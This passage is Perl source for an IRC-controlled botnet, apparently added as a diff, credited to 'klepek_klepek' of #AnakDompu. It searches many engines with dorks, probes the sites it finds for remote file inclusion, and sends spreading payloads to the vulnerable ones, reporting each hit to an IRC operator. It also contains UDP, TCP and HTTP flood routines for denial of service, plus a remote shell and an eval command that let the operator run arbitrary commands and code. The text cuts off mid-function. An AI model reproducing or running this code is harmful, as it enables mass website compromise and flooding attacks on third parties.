$reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +my $cinta="http://".$sito.$bug.$perawan."?"; +my $kasih=HTTP::Request->new(GET=>$cinta); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($kasih); +}} +elsif($re =~ /AnakDompu/) +{ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ +$x=os($test); +($type,$space)=split(/\,/,$x); + sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1UOL]11,10[1ON] 13,6[1TaRgEt]7,1 $print"); +my $test2="http://".$sito.$bug.$idku."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +}}} +exit; +}} + +###################################################################### +#################### ALTAVISTA +###################################################################### +if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){ +if (my $pid = fork) { +waitpid($pid, 0); +} else { +if (fork) { +exit; +} else { +my $bug=$1; +my $dork=$2; +my $contatore=0; +my %hosts; +# Starting The Search Engine + my @alist=&altavista($dork); + my @ablist=&altavistade($dork); + my @aclist=&altavistaus($dork); +push(my @tot, @alist,@ablist,@aclist); +my @puliti=&unici(@tot); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Altavista]13,6[1ToTaL]:8,6 ".scalar(@tot)." 11,10[1CleaneD]:8,6 ".scalar(@puliti)." 11,10[1Untuk]13,6[1Dork]4,1 $dork "); +my $uni=scalar(@puliti); +foreach my $sito (@puliti) +{ +$contatore++; +if ($contatore %100==0){ +} +if ($contatore==$uni-1){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1Altavista]11,10[1SeLeSaI]13,6[1UnTuK]11,10[1DoRk]13,1 $dork"); +} +### Print CMD and TEST CMD### +my $test="http://".$sito.$bug.$id."?"; +my $print="http://".$sito.$bug.$cmd."?"; +### End of Print CMD and TEST CMD### +my $req=HTTP::Request->new(GET=>$test); +my $ua=LWP::UserAgent->new(); +$ua->timeout(5); +my $response=$ua->request($req); +if ($response->is_success) { +my $re=$response->content; +if($re =~ /AnakDompu/ && $re =~ /uid=/){ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ +$x=os($test); +($type,$space)=split(/\,/,$x); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Altavista]13,6[1OFF] 11,10[1Uname]10:7 $type 13,6[1TaRgEt]:9,1 $print"); + sendraw($IRC_cur_socket, "PRIVMSG klepek_klepek :Uname:6 $type Vuln:10 $print"); +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +my $cinta="http://".$sito.$bug.$perawan."?"; +my $kasih=HTTP::Request->new(GET=>$cinta); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($kasih); +}} +elsif($re =~ /AnakDompu/) +{ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ +$x=os($test); +($type,$space)=split(/\,/,$x); + sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1Altavista]11,10[1ON] 13,6[1TaRgEt]7,1 $print"); +my $test2="http://".$sito.$bug.$idku."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +}}} +exit; +}} + +###################################################################### +#################### HOTBOT +###################################################################### +if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){ +if (my $pid = fork) { +waitpid($pid, 0); +} else { +if (fork) { +exit; +} else { +my $bug=$1; +my $dork=$2; +my $contatore=0; +my %hosts; +# Starting The Search Engine + my @hlist=&hotbot($dork); + my @hlistb=&hotbotb($dork); +push(my @tot, @hlist, @hlistb); +my @puliti=&unici(@tot); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1HotBot]13,6[1ToTaL]:8,6 ".scalar(@tot)." 11,10[1CleaneD]:8,6 ".scalar(@puliti)." 11,10[1Untuk]13,6[1Dork]4,1 $dork "); +my $uni=scalar(@puliti); +foreach my $sito (@puliti) +{ +$contatore++; +if ($contatore %100==0){ +} +if ($contatore==$uni-1){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1HotBot]11,10[1SeLeSaI]13,6[1UnTuK]11,10[1DoRk]13,1 $dork"); +} +### Print CMD and TEST CMD### +my $test="http://".$sito.$bug.$id."?"; +my $print="http://".$sito.$bug.$cmd."?"; +### End of Print CMD and TEST CMD### +my $req=HTTP::Request->new(GET=>$test); +my $ua=LWP::UserAgent->new(); +$ua->timeout(5); +my $response=$ua->request($req); +if ($response->is_success) { +my $re=$response->content; +if($re =~ /AnakDompu/ && $re =~ /uid=/){ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ +$x=os($test); +($type,$space)=split(/\,/,$x); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1HotBot]13,6[1OFF] 11,10[1Uname]10:7 $type 13,6[1TaRgEt]:9,1 $print"); + sendraw($IRC_cur_socket, "PRIVMSG klepek_klepek :Uname:6 $type Vuln:10 $print"); +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +my $cinta="http://".$sito.$bug.$perawan."?"; +my $kasih=HTTP::Request->new(GET=>$cinta); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($kasih); +}} +elsif($re =~ /AnakDompu/) +{ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ +$x=os($test); +($type,$space)=split(/\,/,$x); + sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1HotBot]11,10[1ON] 13,6[1TaRgEt]7,1 $print"); +my $test2="http://".$sito.$bug.$idku."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +}}} +exit; +}} + +###################################################################### +#################### MAMMA +###################################################################### +if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){ +if (my $pid = fork) { +waitpid($pid, 0); +} else { +if (fork) { +exit; +} else { +my $bug=$1; +my $dork=$2; +my $contatore=0; +my %hosts; +# Starting The Search Engine + my @malist=&mamma($dork); +push(my @tot, @malist); +my @puliti=&unici(@tot); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Mamma]13,6[1ToTaL]:8,6 ".scalar(@tot)." 11,10[1CleaneD]:8,6 ".scalar(@puliti)." 11,10[1Untuk]13,6[1Dork]4,1 $dork "); +my $uni=scalar(@puliti); +foreach my $sito (@puliti) +{ +$contatore++; +if ($contatore %100==0){ +} +if ($contatore==$uni-1){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1Mamma]11,10[1SeLeSaI]13,6[1UnTuK]11,10[1DoRk]13,1 $dork"); +} +### Print CMD and TEST CMD### +my $test="http://".$sito.$bug.$id."?"; +my $print="http://".$sito.$bug.$cmd."?"; +### End of Print CMD and TEST CMD### +my $req=HTTP::Request->new(GET=>$test); +my $ua=LWP::UserAgent->new(); +$ua->timeout(5); +my $response=$ua->request($req); +if ($response->is_success) { +my $re=$response->content; +if($re =~ /AnakDompu/ && $re =~ /uid=/){ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ +$x=os($test); +($type,$space)=split(/\,/,$x); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Mamma]13,6[1OFF] 11,10[1Uname]10:7 $type 13,6[1TaRgEt]:9,1 $print"); + sendraw($IRC_cur_socket, "PRIVMSG klepek_klepek :Uname:6 $type Vuln:10 $print"); +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +my $cinta="http://".$sito.$bug.$perawan."?"; +my $kasih=HTTP::Request->new(GET=>$cinta); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($kasih); +}} +elsif($re =~ /AnakDompu/) +{ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ +$x=os($test); +($type,$space)=split(/\,/,$x); + sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1Mamma]11,10[1ON] 13,6[1TaRgEt]7,1 $print"); +my $test2="http://".$sito.$bug.$idku."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +}}} +exit; +}} + +###################################################################### +#################### MOZBOT +###################################################################### +if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){ +if (my $pid = fork) { +waitpid($pid, 0); +} else { +if (fork) { +exit; +} else { +my $bug=$1; +my $dork=$2; +my $contatore=0; +my %hosts; +# Starting The Search Engine + my @mozlist=&mozbot($dork); + my @mozlista=&mozbota($dork); + my @mozlistb=&mozbotb($dork); +push(my @tot, @mozlist, @mozlista, @mozlistb); +my @puliti=&unici(@tot); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1MozBot]13,6[1ToTaL]:8,6 ".scalar(@tot)." 11,10[1CleaneD]:8,6 ".scalar(@puliti)." 11,10[1Untuk]13,6[1Dork]4,1 $dork "); +my $uni=scalar(@puliti); +foreach my $sito (@puliti) +{ +$contatore++; +if ($contatore %100==0){ +} +if ($contatore==$uni-1){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1MozBot]11,10[1SeLeSaI]13,6[1UnTuK]11,10[1DoRk]13,1 $dork"); +} +### Print CMD and TEST CMD### +my $test="http://".$sito.$bug.$id."?"; +my $print="http://".$sito.$bug.$cmd."?"; +### End of Print CMD and TEST CMD### +my $req=HTTP::Request->new(GET=>$test); +my $ua=LWP::UserAgent->new(); +$ua->timeout(5); +my $response=$ua->request($req); +if ($response->is_success) { +my $re=$response->content; +if($re =~ /AnakDompu/ && $re =~ /uid=/){ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ +$x=os($test); +($type,$space)=split(/\,/,$x); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1MaZbot]13,6[1OFF] 11,10[1Uname]10:7 $type 13,6[1TaRgEt]:9,1 $print"); + sendraw($IRC_cur_socket, "PRIVMSG klepek_klepek :Uname:6 $type Vuln:10 $print"); +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +my $cinta="http://".$sito.$bug.$perawan."?"; +my $kasih=HTTP::Request->new(GET=>$cinta); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($kasih); +}} +elsif($re =~ /AnakDompu/) +{ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ +$x=os($test); +($type,$space)=split(/\,/,$x); + sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1MaZBot]11,10[1ON] 13,6[1TaRgEt]7,1 $print"); +my $test2="http://".$sito.$bug.$idku."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +}}} +exit; +}} + +###################################################################### +#################### AOL +###################################################################### +if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){ +if (my $pid = fork) { +waitpid($pid, 0); +} else { +if (fork) { +exit; +} else { +my $bug=$1; +my $dork=$2; +my $contatore=0; +my %hosts; +# Starting The Search Engine + my @aollist=&aol($dork); + my @aollista=&aola($dork); + my @aollistb=&aolb($dork); + my @aollistc=&aolc($dork); +push(my @aolbyp,@aollist, @aollista, @aollistb, @aollistc ); +push(my @tot, @aolbyp); +my @puliti=&unici(@tot); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1AOL]13,6[1ToTaL]:8,6 ".scalar(@tot)." 11,10[1CleaneD]:8,6 ".scalar(@puliti)." 11,10[1Untuk]13,6[1Dork]4,1 $dork "); +my $uni=scalar(@puliti); +foreach my $sito (@puliti) +{ +$contatore++; +if ($contatore %100==0){ +} +if ($contatore==$uni-1){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1AOL]11,10[1SeLeSaI]13,6[1UnTuK]11,10[1DoRk]13,1 $dork"); +} +### Print CMD and TEST CMD### +my $test="http://".$sito.$bug.$id."?"; +my $print="http://".$sito.$bug.$cmd."?"; +### End of Print CMD and TEST CMD### +my $req=HTTP::Request->new(GET=>$test); +my $ua=LWP::UserAgent->new(); +$ua->timeout(5); +my $response=$ua->request($req); +if ($response->is_success) { +my $re=$response->content; +if($re =~ /AnakDompu/ && $re =~ /uid=/){ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ +$x=os($test); +($type,$space)=split(/\,/,$x); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1AOL]13,6[1OFF] 11,10[1Uname]10:7 $type 13,6[1TaRgEt]:9,1 $print"); + sendraw($IRC_cur_socket, "PRIVMSG klepek_klepek :Uname:6 $type Vuln:10 $print"); +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +my $cinta="http://".$sito.$bug.$perawan."?"; +my $kasih=HTTP::Request->new(GET=>$cinta); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($kasih); +}} +elsif($re =~ /AnakDompu/) +{ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ +$x=os($test); +($type,$space)=split(/\,/,$x); + sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1AOL]11,10[1ON] 13,6[1TaRgEt]7,1 $print"); +my $test2="http://".$sito.$bug.$idku."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +}}} +exit; +}} + +###################################################################### +#################### ASK +###################################################################### +if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){ +if (my $pid = fork) { +waitpid($pid, 0); +} else { +if (fork) { +exit; +} else { +my $bug=$1; +my $dork=$2; +my $contatore=0; +my %hosts; +# Starting The Search Engine + my @asklist=&ask($dork); + my @asklista=&aska($dork); + my @asklistb=&askb($dork); +push(my @tot, @asklist, @asklista, @asklistb); +my @puliti=&unici(@tot); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1ASK]13,6[1ToTaL]:8,6 ".scalar(@tot)." 11,10[1CleaneD]:8,6 ".scalar(@puliti)." 11,10[1Untuk]13,6[1Dork]4,1 $dork "); +my $uni=scalar(@puliti); +foreach my $sito (@puliti) +{ +$contatore++; +if ($contatore %100==0){ +} +if ($contatore==$uni-1){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1ASK]11,10[1SeLeSaI]13,6[1UnTuK]11,10[1DoRk]13,1 $dork"); +} +### Print CMD and TEST CMD### +my $test="http://".$sito.$bug.$id."?"; +my $print="http://".$sito.$bug.$cmd."?"; +### End of Print CMD and TEST CMD### +my $req=HTTP::Request->new(GET=>$test); +my $ua=LWP::UserAgent->new(); +$ua->timeout(5); +my $response=$ua->request($req); +if ($response->is_success) { +my $re=$response->content; +if($re =~ /AnakDompu/ && $re =~ /uid=/){ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ +$x=os($test); +($type,$space)=split(/\,/,$x); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1ASK]13,6[1OFF] 11,10[1Uname]10:7 $type 13,6[1TaRgEt]:9,1 $print"); + sendraw($IRC_cur_socket, "PRIVMSG klepek_klepek :Uname:6 $type Vuln:10 $print"); +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +my $cinta="http://".$sito.$bug.$perawan."?"; +my $kasih=HTTP::Request->new(GET=>$cinta); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($kasih); +}} +elsif($re =~ /AnakDompu/) +{ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ +$x=os($test); +($type,$space)=split(/\,/,$x); + sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1ASK]11,10[1ON] 13,6[1TaRgEt]7,1 $print"); +my $test2="http://".$sito.$bug.$idku."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +}}} +exit; +}} + +###################### +#End of EExPreSiSCANNER# +################################################## +# Ketika Rasa Tak Dapat Di Ungkap Dengan KataЩ # +# www.AnakDompu.by.ru # +# Created By klepek_klepek # +# #AnakDompu # +# irc.dal.net # +################################################## +###################### +if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) { +sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Http DDoS] 13,6[1HaJaR] 10 ".$1." 11,10[1Pada Port 80 Untuk] 12 ".$2." Detik ."); +my $itime = time; +my ($cur_time); +$cur_time = time - $itime; +while ($2>$cur_time){ +$cur_time = time - $itime; +my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80); +print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n"; +close($socket); +} +sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Http DDoS] 13,6[1HaJaR SeLeSaI] 7 ".$1."."); +} +###################### +# End of HTTPFlood # +################################################## +# Ketika Rasa Tak Dapat Di Ungkap Dengan KataЩ # +# www.AnakDompu.by.ru # +# Created By klepek_klepek # +# #AnakDompu # +# irc.dal.net # +################################################## +# UDPFlood # +###################### +if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) { +sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Udp DDoS] 13,6[1HaJaR]12 ".$1." with 12 ".$2." Kb Packets for 12 ".$3." detik."); +my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3"); +$dtime = 1 if $dtime == 0; +my %bytes; +$bytes{igmp} = $2 * $pacotes{igmp}; +$bytes{icmp} = $2 * $pacotes{icmp}; +$bytes{o} = $2 * $pacotes{o}; +$bytes{udp} = $2 * $pacotes{udp}; +$bytes{tcp} = $2 * $pacotes{tcp}; +sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Udp DDoS] 13,6[1HaSiL]12 ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." Kb in12 ".$dtime." seconds to12 ".$1."."); +} +exit; +} +} +###################### +# End of Udpflood # +###################### + + +sub ircase { +my ($kem, $printl, $case) = @_; + if ($case =~ /^join (.*)/) { + j("$1"); + } + if ($case =~ /^part (.*)/) { + p("$1"); + } +if ($case =~ /^rejoin\s+(.*)/) { +my $chan = $1; +if ($chan =~ /^(\d+) (.*)/) { +for (my $ca = 1; $ca <= $1; $ca++ ) { +p("$2"); +j("$2"); +} +} +else { +p("$chan"); +j("$chan"); +} +} + +if ($case =~ /^op/) { +op("$printl", "$kem") if $case eq "op"; +my $oarg = substr($case, 3); +op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/); +} + +if ($case =~ /^deop/) { +deop("$printl", "$kem") if $case eq "deop"; +my $oarg = substr($case, 5); +deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/); +} + +if ($case =~ /^msg\s+(\S+) (.*)/) { +msg("$1", "$2"); +} + +if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) { +for (my $cf = 1; $cf <= $1; $cf++) { +msg("$2", "$3"); +} +} + +if ($case =~ /^ctcp\s+(\S+) (.*)/) { +ctcp("$1", "$2"); +} + +if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) { +for (my $cf = 1; $cf <= $1; $cf++) { +ctcp("$2", "$3"); +} +} + +if ($case =~ /^nick (.*)/) { +nick("$1"); +} + +if ($case =~ /^connect\s+(\S+)\s+(\S+)/) { +conectar("$2", "$1", 6667); +} + +if ($case =~ /^raw (.*)/) { +sendraw("$1"); +} + +if ($case =~ /^eval (.*)/) { +eval "$1"; +} +} + + +sub shell { +my $printl=$_[0]; +my $comando=$_[1]; +if ($comando =~ /cd (.*)/) { +chdir("$1") || msg("$printl", "No such file or directory"); +return; +} + +elsif ($pid = fork) { +waitpid($pid, 0); +} +else { +if (fork) { +exit; + +} else { +my @resp=`$comando 2>&1 3>&1`; +my $c=0; +foreach my $linha (@resp) { + $c++; + chop $linha; + sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha"); + if ($c == "$linas_max") { + $c=0; + sleep $sleep; + } +} +exit; +} +} +} + +sub tcpflooder { +my $itime = time; +my ($cur_time); +my ($ia,$pa,$proto,$j,$l,$t); +$ia=inet_aton($_[0]); +$pa=sockaddr_in($_[1],$ia); +$ftime=$_[2]; +$proto=getprotobyname('tcp'); +$j=0;$l=0; +$cur_time = time - $itime; +while ($l<1000){ +$cur_time = time - $itime; +last if $cur_time >= $ftime; +$t="SOCK$l"; +socket($t,PF_INET,SOCK_STREAM,$proto); +connect($t,$pa)||$j--; +$j++;$l++; +} +$l=0; +while ($l<1000){ +$cur_time = time - $itime; +last if $cur_time >= $ftime; +$t="SOCK$l"; +shutdown($t,2); +$l++; +} +} + +# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.% +# % AnakDompu ExPreSi Scanner Bot % +# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.% + +sub udpflooder { +my $iaddr = inet_aton($_[0]); +my $msg = 'A' x $_[1]; +my $ftime = $_[2]; +my $cp = 0; +my (%pacotes); +$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0; +socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++; +socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++; +socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++; +socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++; +return(undef) if $cp == 4; +my $itime = time; +my ($cur_time); +while ( 1 ) { +for (my $porta = 1; +$porta <= 65000; $porta++) { +$cur_time = time - $itime; +last if $cur_time >= $ftime; +send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++; +send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++; +send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++; +send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++; + + +for (my $pc = 3; +$pc <= 255;$pc++) { +next if $pc == 6; +$cur_time = time - $itime; +last if $cur_time >= $ftime; +socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next; +send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++; +} +} +last if $cur_time >= $ftime; +} +return($cur_time, %pacotes); +} + +sub ctcp { +return unless $#_ == 1; +sendraw("PRIVMSG $_[0] :\001$_[1]\001"); +} + +sub msg { +return unless $#_ == 1; +sendraw("PRIVMSG $_[0] :$_[1]"); +} + +sub notice { +return unless $#_ == 1; +sendraw("NOTICE $_[0] :$_[1]"); +} + +sub op { +return unless $#_ == 1; +sendraw("MODE $_[0] +o $_[1]"); +} + +sub deop { +return unless $#_ == 1; +sendraw("MODE $_[0] -o $_[1]"); +} + +sub j { +&join(@_); +} + +sub join { +return unless $#_ == 0; +sendraw("JOIN $_[0]"); + +} +sub p { part(@_); +} + +sub part { +sendraw("PART $_[0]"); +} + +sub nick { +return unless $#_ == 0; +sendraw("NICK $_[0]"); +} + +sub quit { +sendraw("QUIT :$_[0]"); +} + +##### +# SUBS GOOGLE +##### +sub googlet { +my @dominios = ("ae","com.ar","at","com.au","be","com.br","ca","ch","cl","de","dk"); +my @country = ("AE","AR","AT","AU","BE","BR","CA","CH","CL","DE","DK"); +my @lang = ("en","es","de","nl","pt-BR","it","de","fo","sv","fr","el"); +my @lst; +my $key=key($_[0]); +my $c=0; +foreach my $i (@dominios){ +my @lista = google($i,$key,$lang[$c],$country[$c]); +push(@lst,@lista); +$c++; +} +return @lst; +} + +sub google(){ +my @lst; +my $i=$_[0]; +my $key=$_[1]; +my $lang= $_[2]; +my $country =$_[3]; +for($b=0;$b<=5000;$b+=100){ +my $Go=("www.google.".$i."/search?hl=".$lang."&q=".key($key)."&num=100&start=".$b."&meta=cr%3Dcountry".$country); +my $Res=query($Go); +while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){ +if ($1 !~ /google/){ +my $k=$1; +my @grep=links($k); +push(@lst,@grep); +}}} +return @lst; +} + +##### +# SUBS AllTheWeb +##### + +sub allthewebt { +my @lang = ("en","es","de","nl","pt-BR","it","de","fo"); +my @lst; +my $key=key($_[0]); +my $c=0; +foreach my $lang (@lang){ +my @lista = alltheweb($key,$lang[$c]); +push(@lst,@lista); +$c++; +} +return @lst; +} + + +sub alltheweb(){ +my @lista; +my $key = $_[0]; +my $lang= $_[1]; +for($b=0;$b<=500;$b+=100){ +my $alltheweb=("http://www.alltheweb.com/search?cat=web&_sb_lang=".$lang."&hits=100&q=".key($key)."&o=".$b); +my $Res=query($alltheweb); +while($Res =~ m/<span class=\"?resURL\"?>http:\/\/(.+?)\<\/span>/g){ +my $k=$1; +$k=~s/ //g; +my @grep=links($k); +push(@lst,@grep); +}} +return @lst; +} + +sub standard() +{ +my @lst; +my $key=$_[0]; +my $i=0; +my $pg=0; +for($i=0; $i<=1000; $i+=100) +{ +my $all=("http://www.alltheweb.com/search?cat=web&_sb_lang=any&hits=100&q=".key($key)."&o=".$i); +my $Res=query($all); +while($Res =~ m/<span class=\"?resURL\"?>http:\/\/(.+?)\<\/span>/g){ +my $k=$1; +$k=~s/ //g; +my @grep=links($k); +push(@lst,@grep); +}} +return @lst; +} + +##### +# SUBS Lycos +##### +sub lycos(){ +my @lst; +my $key = $_[0]; +for($b=0;$b<=1000;$b+=100){ +my $ly=("http://search.lycos.com/?query=".key($key)."&page=$av".$b); +my $Res=query($ly); +while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){ +if ($1 !~ /msn|live|google|yahoo/){ +my $k=$1; +my @grep=links($k); +push(@lst,@grep); +}}} +return @lst; +} + +##### +# SUBS Yahoo +##### +sub yahoo(){ +my @lst; +my $key = $_[0]; +for($b=1;$b<=1000;$b+=100){ +my $Ya=("http://br.search.yahoo.com/search?ei=UTF-8&fr=cb-globo&fr2=sfp&p=".key($key)."&n=100&fr=sfp&b=".$b); +my $Res=query($Ya); +while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){ +my $k=$1; +$k=~s/<b>//g; +$k=~s/<\/b>//g; +$k=~s/<wbr>//g; +my @grep=links($k); +push(@lst,@grep); +}} +return @lst; +} + +sub yahooa(){ +my @lst; +my $key = $_[0]; +for($b=210;$b<=1000;$b+=210){ +my $Ya=("http://be.search.yahoo.com/search?ei=UTF-8&fr=cb-globo&fr2=sfp&p=".key($key)."&n=100&fr=sfp&b=".$b); +my $Res=query($Ya); +while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){ +my $k=$1; +$k=~s/<b>//g; +$k=~s/<\/b>//g; +$k=~s/<wbr>//g; +my @grep=links($k); +push(@lst,@grep); +}} +return @lst; +} + +sub yahoob(){ +my @lst; +my $key = $_[0]; +for($b=410;$b<=1000;$b+=210){ +my $Ya=("http://us.search.yahoo.com/search?ei=UTF-8&fr=cb-globo&fr2=sfp&p=".key($key)."&n=100&fr=sfp&b=".$b); +my $Res=query($Ya); +while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){ +my $k=$1; +$k=~s/<b>//g; +$k=~s/<\/b>//g; +$k=~s/<wbr>//g; +my @grep=links($k); +push(@lst,@grep); +}} +return @lst; +} + +sub yahooc(){ +my @lst; +my $key = $_[0]; +for($b=610;$b<=1000;$b+=210){ +my $Ya=("http://it.search.yahoo.com/search?ei=UTF-8&fr=cb-globo&fr2=sfp&p=".key($key)."&n=100&fr=sfp&b=".$b); +my $Res=query($Ya); +while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){ +my $k=$1; +$k=~s/<b>//g; +$k=~s/<\/b>//g; +$k=~s/<wbr>//g; +my @grep=links($k); +push(@lst,@grep); +}} +return @lst; +} + +sub yahood(){ +my @lst; +my $key = $_[0]; +for($b=810;$b<=1000;$b+=210){ +my $Ya=("http://de.search.yahoo.com/search?ei=UTF-8&fr=cb-globo&fr2=sfp&p=".key($key)."&n=100&fr=sfp&b=".$b); +my $Res=query($Ya); +while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){ +my $k=$1; +$k=~s/<b>//g; +$k=~s/<\/b>//g; +$k=~s/<wbr>//g; +my @grep=links($k); +push(@lst,@grep); +}} +return @lst; +} + + +##### +# SUBS MSN +##### +sub msn(){ +my @lst; +my $key = $_[0]; +for($b=1;$b<=1000;$b+=10){ +my $MsN=("http://search.live.com/results.aspx?q=".key($key)."&first=".$b."&FORM=PERE"); +my $Res=query($MsN); +while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){ +if($1 !~ /msn|live/){ +my $k=$1; +my @grep=links($k); +push(@lst,@grep); +}}} +return @lst; +} + +##### +# SUBS SEARCH +##### +sub search(){ +my @lst; +my $key = $_[0]; +for($b=0;$b<=1000;$b+=100){ +my $ser=("http://www.search.com/search?q=".key($key)."".$b); +my $Res=query($ser); +while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){ +if ($1 !~ /msn|live|google|yahoo/){ +my $k=$1; +my @grep=links($k); +push(@lst,@grep); +}}} +return @lst; +} + +##### +# SUBS FireBall +##### +sub fireball(){ +my $key=$_[0]; +my 